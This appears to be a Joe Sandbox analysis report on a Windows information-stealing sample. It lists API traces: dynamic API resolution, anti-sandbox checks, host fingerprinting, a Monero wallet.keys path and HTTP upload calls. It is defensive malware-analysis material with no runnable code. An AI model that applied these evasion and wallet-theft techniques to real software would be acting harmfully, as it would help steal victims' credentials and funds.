                                      Control-flow Graph (legend: Executed / Not Executed; rendered graph not reproduced in text). Basic blocks span f27690 to f2781e and call, in order, GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap and wsprintfA, with subcalls to f28e90 and f2aa50.
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F276D2
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F2770F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27793
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F2779A
                                      • wsprintfA.USER32 ref: 00F277D0
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 1544550907-3809124531
                                      • Opcode ID: 175f8c3c911f15305b94b60859e0b1e9f74dbe1f3eda606ea9438c7bb42efba5
                                      • Instruction ID: 94f2a8b372a5d89341f86b28a2191c307068dba8b85c4499a0cd871dc7bace39
                                      • Opcode Fuzzy Hash: 175f8c3c911f15305b94b60859e0b1e9f74dbe1f3eda606ea9438c7bb42efba5
                                      • Instruction Fuzzy Hash: F44194B1D04358DBDB14DFD4DC45BDEBBB8AF48704F104099F609AB280D778AA84DBA5
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F111B7), ref: 00F27A10
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F27A17
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F27A2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser
                                      • String ID:
                                      • API String ID: 1296208442-0
                                      • Opcode ID: 79aba22e8a9cd62bd388bbb8a3d2f16d7e9d26c20289d5d8ee22fcfb70dc8138
                                      • Instruction ID: 4964c5d4f762121124ea51298a60cd011d4138ee4fd0478146f3b01d7021f65c
                                      • Opcode Fuzzy Hash: 79aba22e8a9cd62bd388bbb8a3d2f16d7e9d26c20289d5d8ee22fcfb70dc8138
                                      • Instruction Fuzzy Hash: 5FF04FB1D44209EBD714DFD8DD45BAEBBB8EB05721F10022AFA15A6680C7B555408BE1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: 24cc833ec2507d310fce2aaf5ef79b01465bedd8b4a9e1e40750f4cf0e73739c
                                      • Instruction ID: cffe8944923e8652ba091b1fdfdddb634c49e6d1cbb0a559c2e4e6677bf4b0cb
                                      • Opcode Fuzzy Hash: 24cc833ec2507d310fce2aaf5ef79b01465bedd8b4a9e1e40750f4cf0e73739c
                                      • Instruction Fuzzy Hash: A6D05E7490030CABDB18DFE098496DDBBB9BB08215F000568D91572280EA3094C1CBA5

                                      Control-flow Graph (legend: Executed / Not Executed; rendered graph not reproduced in text). Basic blocks span f29f20 to f2aa19; the function is a sequence of GetProcAddress resolution runs (43 calls in the first block, then groups of between 1 and 10 per library) with a block of eight LoadLibraryA calls after the first run.
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,01D757B0), ref: 00F29F3D
                                      • GetProcAddress.KERNEL32(74DD0000,01D757D0), ref: 00F29F55
                                      • GetProcAddress.KERNEL32(74DD0000,01D894F0), ref: 00F29F6E
                                      • GetProcAddress.KERNEL32(74DD0000,01D89400), ref: 00F29F86
                                      • GetProcAddress.KERNEL32(74DD0000,01D893D0), ref: 00F29F9E
                                      • GetProcAddress.KERNEL32(74DD0000,01D89538), ref: 00F29FB7
                                      • GetProcAddress.KERNEL32(74DD0000,01D7B9A0), ref: 00F29FCF
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CFA8), ref: 00F29FE7
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CEA0), ref: 00F2A000
                                      • GetProcAddress.KERNEL32(74DD0000,01D8D050), ref: 00F2A018
                                      • GetProcAddress.KERNEL32(74DD0000,01D8D068), ref: 00F2A030
                                      • GetProcAddress.KERNEL32(74DD0000,01D75970), ref: 00F2A049
                                      • GetProcAddress.KERNEL32(74DD0000,01D75830), ref: 00F2A061
                                      • GetProcAddress.KERNEL32(74DD0000,01D75910), ref: 00F2A079
                                      • GetProcAddress.KERNEL32(74DD0000,01D75A10), ref: 00F2A092
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CEE8), ref: 00F2A0AA
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CE58), ref: 00F2A0C2
                                      • GetProcAddress.KERNEL32(74DD0000,01D7B888), ref: 00F2A0DB
                                      • GetProcAddress.KERNEL32(74DD0000,01D75A90), ref: 00F2A0F3
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CF00), ref: 00F2A10B
                                      • GetProcAddress.KERNEL32(74DD0000,01D8D080), ref: 00F2A124
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CEB8), ref: 00F2A13C
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CF90), ref: 00F2A154
                                      • GetProcAddress.KERNEL32(74DD0000,01D75950), ref: 00F2A16D
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CE70), ref: 00F2A185
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CF18), ref: 00F2A19D
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CF30), ref: 00F2A1B6
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CE10), ref: 00F2A1CE
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CE28), ref: 00F2A1E6
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CF60), ref: 00F2A1FF
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CFD8), ref: 00F2A217
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CE88), ref: 00F2A22F
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CED0), ref: 00F2A248
                                      • GetProcAddress.KERNEL32(74DD0000,01D8A4B0), ref: 00F2A260
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CE40), ref: 00F2A278
                                      • GetProcAddress.KERNEL32(74DD0000,01D8D008), ref: 00F2A291
                                      • GetProcAddress.KERNEL32(74DD0000,01D75990), ref: 00F2A2A9
                                      • GetProcAddress.KERNEL32(74DD0000,01D8D0E0), ref: 00F2A2C1
                                      • GetProcAddress.KERNEL32(74DD0000,01D75850), ref: 00F2A2DA
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CF48), ref: 00F2A2F2
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CFF0), ref: 00F2A30A
                                      • GetProcAddress.KERNEL32(74DD0000,01D759B0), ref: 00F2A323
                                      • GetProcAddress.KERNEL32(74DD0000,01D75C90), ref: 00F2A33B
                                      • LoadLibraryA.KERNEL32(01D8CF78,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A34D
                                      • LoadLibraryA.KERNEL32(01D8D098,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A35E
                                      • LoadLibraryA.KERNEL32(01D8CFC0,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A370
                                      • LoadLibraryA.KERNEL32(01D8D020,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A382
                                      • LoadLibraryA.KERNEL32(01D8D038,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A393
                                      • LoadLibraryA.KERNEL32(01D8D0B0,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A3A5
                                      • LoadLibraryA.KERNEL32(01D8CDF8,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A3B7
                                      • LoadLibraryA.KERNEL32(01D8D0C8,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A3C8
                                      • GetProcAddress.KERNEL32(75290000,01D75E30), ref: 00F2A3EA
                                      • GetProcAddress.KERNEL32(75290000,01D8D338), ref: 00F2A402
                                      • GetProcAddress.KERNEL32(75290000,01D892C8), ref: 00F2A41A
                                      • GetProcAddress.KERNEL32(75290000,01D8D158), ref: 00F2A433
                                      • GetProcAddress.KERNEL32(75290000,01D75B30), ref: 00F2A44B
                                      • GetProcAddress.KERNEL32(73440000,01D7B928), ref: 00F2A470
                                      • GetProcAddress.KERNEL32(73440000,01D75CB0), ref: 00F2A489
                                      • GetProcAddress.KERNEL32(73440000,01D7B6D0), ref: 00F2A4A1
                                      • GetProcAddress.KERNEL32(73440000,01D8D1D0), ref: 00F2A4B9
                                      • GetProcAddress.KERNEL32(73440000,01D8D128), ref: 00F2A4D2
                                      • GetProcAddress.KERNEL32(73440000,01D75B70), ref: 00F2A4EA
                                      • GetProcAddress.KERNEL32(73440000,01D75C70), ref: 00F2A502
                                      • GetProcAddress.KERNEL32(73440000,01D8D350), ref: 00F2A51B
                                      • GetProcAddress.KERNEL32(752C0000,01D75B10), ref: 00F2A53C
                                      • GetProcAddress.KERNEL32(752C0000,01D75C10), ref: 00F2A554
                                      • GetProcAddress.KERNEL32(752C0000,01D8D3E0), ref: 00F2A56D
                                      • GetProcAddress.KERNEL32(752C0000,01D8D3B0), ref: 00F2A585
                                      • GetProcAddress.KERNEL32(752C0000,01D75DF0), ref: 00F2A59D
                                      • GetProcAddress.KERNEL32(74EC0000,01D7B680), ref: 00F2A5C3
                                      • GetProcAddress.KERNEL32(74EC0000,01D7B8B0), ref: 00F2A5DB
                                      • GetProcAddress.KERNEL32(74EC0000,01D8D3C8), ref: 00F2A5F3
                                      • GetProcAddress.KERNEL32(74EC0000,01D75BD0), ref: 00F2A60C
                                      • GetProcAddress.KERNEL32(74EC0000,01D75E50), ref: 00F2A624
                                      • GetProcAddress.KERNEL32(74EC0000,01D7B6A8), ref: 00F2A63C
                                      • GetProcAddress.KERNEL32(75BD0000,01D8D218), ref: 00F2A662
                                      • GetProcAddress.KERNEL32(75BD0000,01D75C50), ref: 00F2A67A
                                      • GetProcAddress.KERNEL32(75BD0000,01D891D8), ref: 00F2A692
                                      • GetProcAddress.KERNEL32(75BD0000,01D8D170), ref: 00F2A6AB
                                      • GetProcAddress.KERNEL32(75BD0000,01D8D0F8), ref: 00F2A6C3
                                      • GetProcAddress.KERNEL32(75BD0000,01D75D70), ref: 00F2A6DB
                                      • GetProcAddress.KERNEL32(75BD0000,01D75DD0), ref: 00F2A6F4
                                      • GetProcAddress.KERNEL32(75BD0000,01D8D110), ref: 00F2A70C
                                      • GetProcAddress.KERNEL32(75BD0000,01D8D1E8), ref: 00F2A724
                                      • GetProcAddress.KERNEL32(75A70000,01D75AD0), ref: 00F2A746
                                      • GetProcAddress.KERNEL32(75A70000,01D8D188), ref: 00F2A75E
                                      • GetProcAddress.KERNEL32(75A70000,01D8D200), ref: 00F2A776
                                      • GetProcAddress.KERNEL32(75A70000,01D8D260), ref: 00F2A78F
                                      • GetProcAddress.KERNEL32(75A70000,01D8D1A0), ref: 00F2A7A7
                                      • GetProcAddress.KERNEL32(75450000,01D75C30), ref: 00F2A7C8
                                      • GetProcAddress.KERNEL32(75450000,01D75CD0), ref: 00F2A7E1
                                      • GetProcAddress.KERNEL32(75DA0000,01D75B50), ref: 00F2A802
                                      • GetProcAddress.KERNEL32(75DA0000,01D8D1B8), ref: 00F2A81A
                                      • GetProcAddress.KERNEL32(6F070000,01D75BF0), ref: 00F2A840
                                      • GetProcAddress.KERNEL32(6F070000,01D75CF0), ref: 00F2A858
                                      • GetProcAddress.KERNEL32(6F070000,01D75D10), ref: 00F2A870
                                      • GetProcAddress.KERNEL32(6F070000,01D8D2F0), ref: 00F2A889
                                      • GetProcAddress.KERNEL32(6F070000,01D75B90), ref: 00F2A8A1
                                      • GetProcAddress.KERNEL32(6F070000,01D75E10), ref: 00F2A8B9
                                      • GetProcAddress.KERNEL32(6F070000,01D75BB0), ref: 00F2A8D2
                                      • GetProcAddress.KERNEL32(6F070000,01D75D30), ref: 00F2A8EA
                                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00F2A901
                                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00F2A917
                                      • GetProcAddress.KERNEL32(75AF0000,01D8D140), ref: 00F2A939
                                      • GetProcAddress.KERNEL32(75AF0000,01D89188), ref: 00F2A951
                                      • GetProcAddress.KERNEL32(75AF0000,01D8D380), ref: 00F2A969
                                      • GetProcAddress.KERNEL32(75AF0000,01D8D278), ref: 00F2A982
                                      • GetProcAddress.KERNEL32(75D90000,01D75D50), ref: 00F2A9A3
                                      • GetProcAddress.KERNEL32(6E360000,01D8D398), ref: 00F2A9C4
                                      • GetProcAddress.KERNEL32(6E360000,01D75AF0), ref: 00F2A9DD
                                      • GetProcAddress.KERNEL32(6E360000,01D8D320), ref: 00F2A9F5
                                      • GetProcAddress.KERNEL32(6E360000,01D8D230), ref: 00F2AA0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                      • API String ID: 2238633743-1775429166
                                      • Opcode ID: 5dc43e0754e790e8069ebc291053a045f96e7be608f06259ee8e52d075a8d55b
                                      • Instruction ID: d6fbe181284ae832b6d89baeb6d0963d9bf288cb187d3aa5b950cf59f249e1d5
                                      • Opcode Fuzzy Hash: 5dc43e0754e790e8069ebc291053a045f96e7be608f06259ee8e52d075a8d55b
                                      • Instruction Fuzzy Hash: 226240B55002019FE36CDFE8F88895677EAF75D701740893AF92ACB298D635A5C1CBA0

                                      Control-flow Graph

                                      • Graph for the function starting at 00F148D0 (executed and not-executed blocks; graph data not reproduced)
                                      APIs
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F14889
                                        • Part of subcall function 00F14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14899
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F14965
                                      • StrCmpCA.SHLWAPI(?,01D8E958), ref: 00F1498A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F14B0A
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00F30DDE,00000000,?,?,00000000,?,",00000000,?,01D8EB08), ref: 00F14E38
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F14E54
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F14E68
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F14E99
                                      • InternetCloseHandle.WININET(00000000), ref: 00F14EFD
                                      • InternetCloseHandle.WININET(00000000), ref: 00F14F15
                                      • HttpOpenRequestA.WININET(00000000,01D8EA38,?,01D8E3C8,00000000,00000000,00400100,00000000), ref: 00F14B65
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00F14F1F
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 460715078-2180234286
                                      • Opcode ID: f683464fe5ce714280f4ff52e660d016e2585e51c2412c3364738cbc93cdf460
                                      • Instruction ID: 67cf51593731c5632bc985ba10e2de40fdba8e8d6ab0cbb2432fba09b09a0c34
                                      • Opcode Fuzzy Hash: f683464fe5ce714280f4ff52e660d016e2585e51c2412c3364738cbc93cdf460
                                      • Instruction Fuzzy Hash: 1212FC72911128ABCB19EB90ED62FEEB379BF54300F504599F10672091DF786B88DF62

                                      Control-flow Graph

                                      • Graph for the function starting at 00F25760 (executed and not-executed blocks; graph data not reproduced)
                                      APIs
                                        • Part of subcall function 00F2AB30: lstrlen.KERNEL32(00F14F55,?,?,00F14F55,00F30DDF), ref: 00F2AB3B
                                        • Part of subcall function 00F2AB30: lstrcpy.KERNEL32(00F30DDF,00000000), ref: 00F2AB95
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F25894
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F258F1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F25AA7
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F25440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F25478
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F25510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F25568
                                        • Part of subcall function 00F25510: lstrlen.KERNEL32(00000000), ref: 00F2557F
                                        • Part of subcall function 00F25510: StrStrA.SHLWAPI(00000000,00000000), ref: 00F255B4
                                        • Part of subcall function 00F25510: lstrlen.KERNEL32(00000000), ref: 00F255D3
                                        • Part of subcall function 00F25510: lstrlen.KERNEL32(00000000), ref: 00F255FE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F259DB
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F25B90
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F25C5C
                                      • Sleep.KERNEL32(0000EA60), ref: 00F25C6B
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleep
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 507064821-2791005934
                                      • Opcode ID: 11e853fbbdfa34a53bae32a8caa2bbada5f0bdf6885ffe1b8a37bf9cbaf5feec
                                      • Instruction ID: 152a1b05d6309bd01aaa09090464215037847d92699d8e164508e169713ac9ad
                                      • Opcode Fuzzy Hash: 11e853fbbdfa34a53bae32a8caa2bbada5f0bdf6885ffe1b8a37bf9cbaf5feec
                                      • Instruction Fuzzy Hash: E4E124729101149BCB18FBE0FD63AED737DBF94700F408568F51666095EF386A48EB62

                                      Control-flow Graph

                                      • Graph for the function starting at 00F219F0 (executed and not-executed blocks; graph data not reproduced)
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 00F21A15
                                      • ExitProcess.KERNEL32 ref: 00F21A21
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: block
                                      • API String ID: 621844428-2199623458
                                      • Opcode ID: 5caf66791c8dc2f123a2fc11371fa0f557305c9485a6a0950c91eb4413a9821d
                                      • Instruction ID: 96d3d34bd1a8e3443e124bacfababc2d2c36cd0d0158f10e26c78edb20f4e32a
                                      • Opcode Fuzzy Hash: 5caf66791c8dc2f123a2fc11371fa0f557305c9485a6a0950c91eb4413a9821d
                                      • Instruction Fuzzy Hash: E851B178B0420AEFDB14DFD4E954BAE37B9FF94304F104058E412AB280EB74E941EB66

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D82470), ref: 00F29BF1
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D82260), ref: 00F29C0A
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D82368), ref: 00F29C22
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D82278), ref: 00F29C3A
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D82338), ref: 00F29C53
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D89138), ref: 00F29C6B
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D75A70), ref: 00F29C83
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D75730), ref: 00F29C9C
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D82488), ref: 00F29CB4
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D823B0), ref: 00F29CCC
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D82290), ref: 00F29CE5
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D823C8), ref: 00F29CFD
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D75770), ref: 00F29D15
                                        • Part of subcall function 00F29BB0: GetProcAddress.KERNEL32(74DD0000,01D823F8), ref: 00F29D2E
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F111D0: ExitProcess.KERNEL32 ref: 00F11211
                                        • Part of subcall function 00F11160: GetSystemInfo.KERNEL32(?), ref: 00F1116A
                                        • Part of subcall function 00F11160: ExitProcess.KERNEL32 ref: 00F1117E
                                        • Part of subcall function 00F11110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F1112B
                                        • Part of subcall function 00F11110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00F11132
                                        • Part of subcall function 00F11110: ExitProcess.KERNEL32 ref: 00F11143
                                        • Part of subcall function 00F11220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F1123E
                                        • Part of subcall function 00F11220: __aulldiv.LIBCMT ref: 00F11258
                                        • Part of subcall function 00F11220: __aulldiv.LIBCMT ref: 00F11266
                                        • Part of subcall function 00F11220: ExitProcess.KERNEL32 ref: 00F11294
                                        • Part of subcall function 00F26A10: GetUserDefaultLangID.KERNEL32 ref: 00F26A14
                                        • Part of subcall function 00F11190: ExitProcess.KERNEL32 ref: 00F111C6
                                        • Part of subcall function 00F279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F111B7), ref: 00F27A10
